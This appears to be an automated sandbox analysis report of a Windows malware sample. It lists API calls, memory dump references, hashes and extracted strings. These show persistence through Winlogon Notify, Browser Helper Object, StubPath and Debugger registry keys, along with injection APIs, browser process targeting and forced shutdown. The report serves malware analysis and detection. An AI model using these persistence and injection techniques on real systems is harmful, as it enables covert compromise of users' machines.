                                                                                                                                                                                                              • SetFileTime.KERNEL32(00000000,?,?,?,00000000,?,?,00000100,?,?,00000104), ref: 00404B1E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?,00000100,?,?,00000104), ref: 00404B27
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,00000100,?,?,00000104), ref: 00404B3C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000021,?,?,?,00000100,?,?,00000104), ref: 00404B48
                                                                                                                                                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00404B55
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00404B75
                                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000100,?,?,00000104), ref: 00404B7F
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000104), ref: 00404BA5
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000104,?,?,?,?,?,?,?,004120C4,?), ref: 00404BC3
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 00404BF8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 00404C04
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00001000,00401379,?,00000000,?), ref: 00404C3F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,00000104,?,?,?,?,?,?,?,004120C4,?), ref: 00404C48
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,0040F520,?), ref: 00404C95
                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00404CB5
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00411030,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404CC6
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,00759810,?,00411030,?,00000104), ref: 00404CCD
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,{9703941E-446E-952F-954A-3DA8A91ED84F},?,?,00000104), ref: 00404CF3
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00002710,?,?,?,?,?,00000104), ref: 00404D0F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00002710,?,?,?,?,?,00000104), ref: 00404D1E
                                                                                                                                                                                                              • Sleep.KERNEL32(000007D0,?,?,?,{9703941E-446E-952F-954A-3DA8A91ED84F},?,?,00000104), ref: 00404D30
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,{9703941E-446E-952F-954A-3DA8A91ED84F},?,?,00000104), ref: 00404D48
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404D63
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,0040F580,00000C00,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00404D9D
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00404E01
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E3B
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00404E74
                                                                                                                                                                                                              • SetFileTime.KERNEL32(?,?,?,?), ref: 00404EA9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00404EB8
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00404ED7
                                                                                                                                                                                                              • RegDeleteValueA.ADVAPI32(?,Debugger,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00404EEB
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00404F03
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Debugger,00000000,00000001,?,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 00404F1E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00000080,00000000), ref: 00404F42
                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00404F72
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,QlC5hT0yHn63XEm5LqJ2OxSkGj2v,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404F98
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404FB5
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00404FD2
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00404FDE
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00405088
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,004101C0), ref: 004050C3
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,{36303932-3930-3630-3932-393036303932},?,004101C0), ref: 004050CE
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 004050E4
                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040510D
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00411030), ref: 0040511E
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,00759A18,?,00411030), ref: 00405125
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,{10F5781A-0D97-0F99-EF77-BA382916E579},?,?,00411030), ref: 0040514B
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00002710,?,?,?,?,?,00411030), ref: 00405167
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00002710,?,?,?,?,?,00411030), ref: 00405176
                                                                                                                                                                                                              • Sleep.KERNEL32(000007D0,?,?,?,{10F5781A-0D97-0F99-EF77-BA382916E579},?,?,00411030), ref: 00405188
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,{10F5781A-0D97-0F99-EF77-BA382916E579},?,?,00411030), ref: 004051A0
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 004051BB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00410200,00000800,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 004051F5
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 0040525A
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405291
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 004052CB
                                                                                                                                                                                                              • SetFileTime.KERNEL32(?,?,?,?), ref: 00405300
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040530F
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0040532E
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,IsInstalled,00000000,00000004,00000001,00000004,?,?,?,?,?,00000000,00000000), ref: 0040536A
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,00000004,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00405373
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,StubPath,00000000,00000001,?,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 0040538E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00000080,00000000), ref: 004053B2
                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,?), ref: 004053C7
                                                                                                                                                                                                              • RegDeleteValueA.ADVAPI32(00000000,ShellRegEx), ref: 004053F3
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,ShellRegEx), ref: 00405402
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?), ref: 00405445
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,?), ref: 00405464
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 00405480
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,00000080), ref: 00405489
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004054B0
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 004054CE
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004054ED
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040551E
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?), ref: 004055C0
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?,?), ref: 004055D5
                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(%AppData%\,?,00000104,?,?,?), ref: 00405610
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,tmp,00000000,?,00000104,?,?,?), ref: 0040562C
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000104,?,?,?), ref: 0040564B
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,00000104,?,?,?), ref: 00405673
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,tmp,00000000,?,?,?,?,?,00000104,?,?,?), ref: 00405693
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,00000104,?,?,?), ref: 004056B6
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 004056EA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000104), ref: 004056F6
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000), ref: 00405715
                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405760
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00411030,?,00000104,?,?,?,?,?,?,00000104,?,?,?), ref: 00405771
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,00759838,?,00411030,?,00000104,?,?,?,?,?,?,00000104,?,?,?), ref: 00405778
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00759838,?,00411030,?,00000104,?,?,?,?,?,?,00000104), ref: 00405783
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00411030,?,00000104), ref: 0040579E
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00407C80,00001400,?,00000000,?,?,?,?,?,?,00000080,00000000,?,00000104,?), ref: 004057DC
                                                                                                                                                                                                              • SetFileTime.KERNEL32(?,?,?,?), ref: 0040580A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00405819
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000080,00000000,00411030,?,00000104,?,?,?,?,?,?,00000104), ref: 0040586E
                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(%AppData%\,?,00000104,?,?,?,?,00000080,00000000,00411030,?,00000104), ref: 004058AC
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000104,?,?,?,?,00000080,00000000,00411030,?,00000104), ref: 004058BB
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,00000080,00000000,00411030,?,00000104), ref: 004058C6
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,00000104,?,?,?,?,00000080), ref: 004058E1
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000080,00000000,?,?,?,00000104,?,?,?,?,00000080,00000000,00411030), ref: 004058FD
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 0040591B
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405927
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405932
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000104,?,?,?,?,?,?,00000080), ref: 0040594D
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000080,00000000,?,00000104,?,?,?,?,?,?,00000080,00000000), ref: 00405969
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040599B
                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(%AppData%\,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 004059C0
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000080,00000000), ref: 004059CF
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000080), ref: 004059DA
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,00000104), ref: 004059F5
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00405A27
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000), ref: 00405A33
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405A50
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405A5C
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,?,00000104,?,?,?,?,?,?,00000080,00000000,?,?,?,00000104), ref: 00405A67
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000104,?,?,?,?,?,?,00000080), ref: 00405A82
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000,?,00000104,?), ref: 00405AB4
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,00409080,00006400,?,00000000,?,?,?,?,?,?,00000080,00000000,?,00000104), ref: 00405AC0
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00006400,?,00000000), ref: 00405AF8
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,00410A40,00000000,00020006,?,?,?,?,?,?,?,00000080,00000000,?,00000104,?), ref: 00405B2E
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,00410A40,00000000,00020006,?), ref: 00405B4F
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,00020006,?,?,?,?,?,?,?,00000080,00000000), ref: 00405B79
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00000000,00000001,?,00000001,?,?,?,?,?,?,?,00020006,?), ref: 00405B95
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00020006,?,?,?,?,?,?,?,00000080,00000000), ref: 00405BA7
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,00410A80,?), ref: 00405BF2
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00410AB5,00000000,00000004,?,00000004), ref: 00405C1B
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000004,?,?,?,?,?,?,?,?,?,?,?,00020006,?), ref: 00405C2A
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,00410AE0,00000000,00020006,?,?,?,?,?), ref: 00405C9C
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00410B03,00000000,00000004,?,00000004,?,?,?,?,?,?,?,?,?), ref: 00405CC5
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00410B15,00000000,00000004,?,00000004,?,00410B03,00000000,00000004,?,00000004), ref: 00405CDD
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00410B2C,00000000,00000004,?,00000004,?,00410B15,00000000,00000004,?,00000004,?,00410B03,00000000,00000004), ref: 00405CF5
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00410B42,00000000,00000004,?,00000004,?,00410B2C,00000000,00000004,?,00000004,?,00410B15,00000000,00000004), ref: 00405D0D
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000004,?,?,?,?,?,?,?,?,?), ref: 00405D1C
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,00410B60,00000000,0002001F,?,?,?,?,?,00020006,?,?,?,?,?), ref: 00405D52
                                                                                                                                                                                                              • RegDeleteValueA.ADVAPI32(?,00000000,?,?,?,0002001F,?,?,?,?,?,00020006,?), ref: 00405DCE
                                                                                                                                                                                                              • RegEnumValueA.ADVAPI32(?,?,00000000,?,00000000,?,00004000,00004000), ref: 00405E0A
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00405E24
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000001,?,?,?,?,0002001F,?), ref: 00405E3B
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0002001F,?), ref: 00405E54
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00010000,00402818,00000002,00000000,?), ref: 00405E77
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00020006,?), ref: 00405E80
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000021), ref: 00405F00
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 00405F1D
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,IsInstalled,00000000,00000004,00000001,00000004), ref: 00405F5D
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,00000004), ref: 00405F66
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,StubPath,00000000,00000001,?,00000001), ref: 00405F81
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 00405F90
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,?,?,?,?,00000001), ref: 00405FAC
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,0040F520,?), ref: 00405FC6
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00405FE6
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Debugger,00000000,00000001,?,00000001), ref: 00406001
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 00406010
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,00410A40,00000000,00020006,?), ref: 00406039
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,00410A40,00000000,00020006,?), ref: 0040605A
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,00020006,?), ref: 00406071
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00000000,00000001,?,00000001,?,?,?,?,?,?,?,00020006,?), ref: 0040608D
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,?,?,?,?,00020006,?), ref: 0040609C
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 004060D6
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,000F003F,0040F4FC,?,00000000), ref: 00406102
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,ShellRegEx,00000000,00000003,?,0000022A,?,?,0040F4FC,?,00000000), ref: 0040612E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,0000022A,?,?,0040F4FC,?,00000000,?,?,?,?,?,?,?,?,00000001), ref: 0040613D
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,?,?,?,?,?,0040F4FC,?,00000000), ref: 00406152
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B},?), ref: 0040617C
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0040619C
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,DLLName,00000000,00000001,?,00000001), ref: 004061B7
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,Startup,00000000,00000001,Startup,00000008,?,DLLName,00000000,00000001,?,00000001), ref: 004061D3
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 004061E2
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000000,CLSID\{F1ACE452-91D3-FF14-6B60-AD3718D5C8FC}\InProcServer32,?), ref: 00406204
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0040621B
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 00406233
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,ThreadingModel,00000000,00000001,Both,00000005,?,00000000,00000000,00000001,?,00000001), ref: 0040624F
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,?,00000001), ref: 0040625E
                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F1ACE452-91D3-FF14-6B60-AD3718D5C8FC},?), ref: 00406271
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00406287
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000021,?,?,?,?,?,?,?,00000001), ref: 0040629C
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,00000021,?,?,?,?,?,?,?,00000001), ref: 004062A9
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 004062DF
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,g00d d0gg,00000000,00000000,?,?,?,?,00000000,?,00000000), ref: 0040631D
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,g00d d0gg,00000000,00000004,?,00000004,?,?,?,?,?,?,00000000,?,00000000), ref: 00406356
                                                                                                                                                                                                              • RegDeleteValueA.ADVAPI32(?,g00d d0gg,?,?,?,?,?,?,00000000,?,00000000), ref: 0040636F
                                                                                                                                                                                                              • Sleep.KERNEL32(00001388,g00d d0gg,?,?,?,?,?,?,00000000,?,00000000), ref: 0040637C
                                                                                                                                                                                                              • RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 0040639B
                                                                                                                                                                                                              • NtShutdownSystem.NTDLL(00000001), ref: 004063A6
                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000006,00000000), ref: 004063B8
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 004063CA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004063E1
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,00412170,?,?,?,0040F4FC,?,00000000), ref: 004063F8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,qnd_b__-13), ref: 00406409
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.3817436842.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817400178.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817575956.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817611138.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Close$Create$Value$Handle$AddressProclstrcat$Attributes$Process$lstrlen$DeleteOpenWritelstrcpy$EnvironmentExpandStrings$CurrentLibraryLoadQuerySystemTempTime$DirectoryErrorExitLastNameObjectProcess32SingleSleepWaitlstrcmpi$MutexPathReadStartupThreadwsprintf$AdjustFirstInfoInformationNextPointerPrivilegeSizeSnapshotTokenToolhelp32$ClassCommandComputerCountEnumHeapLineModulePriorityShutdownTerminateTickVersionWindows
                                                                                                                                                                                                              • String ID: %02X$%AppData%\$%ComSpec%$%CommonProgramFiles%\System\$--k33p$.dll$.exe$Both$CLSID\{F1ACE452-91D3-FF14-6B60-AD3718D5C8FC}\InProcServer32$CreateRemoteThread$DLLName$Debugger$Default Flags$Extended Flags$GetIpAddrTable$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$InternetSetOptionA$IsInstalled$NtAllocateVirtualMemory$NtOpenProcessToken$NtQueryInformationToken$NtShutdownSystem$NtWriteVirtualMemory$QlC5hT0yHn63XEm5LqJ2OxSkGj2v$RasEnumConnectionsA$RtlAdjustPrivilege$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F1ACE452-91D3-FF14-6B60-AD3718D5C8FC}$ShellRegEx$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy$Startup$StubPath$ThreadingModel$explorer.exe$f$firefox.exe$g00d d0gg$iexplore.exe$iphlpapi.dll$kernel32.dll$mozilla.exe$ntdll.dll$opera.exe$qnd_b__-13$rasapi32.dll$seamonkey.exe$tmp$wininet.dll$winlogon.exe${%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}${10F5781A-0D97-0F99-EF77-BA382916E579}${36303932-3930-3630-3932-393036303932}${9703941E-446E-952F-954A-3DA8A91ED84F}
                                                                                                                                                                                                              • API String ID: 3095950084-3441449777
                                                                                                                                                                                                              • Opcode ID: a62609c3cb3bb1ea0ac5c712321f02f5fcc95e8f60100627266ebdecb58e8315
                                                                                                                                                                                                              • Instruction ID: fcd3a91cfab7fa25ee27508f4df0295c9928967f58dd1d1f7e7acfc0775f1f2c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a62609c3cb3bb1ea0ac5c712321f02f5fcc95e8f60100627266ebdecb58e8315
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1233BB19443406AE630B6349D47F9B3A989B40318F140A3FFA89B61D3E77C9529C79F
                                                                                                                                                                                                              Function 004019AA Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 229processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004019BF
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 00401A0A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401C12
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.3817436842.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817400178.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817575956.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.3817611138.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
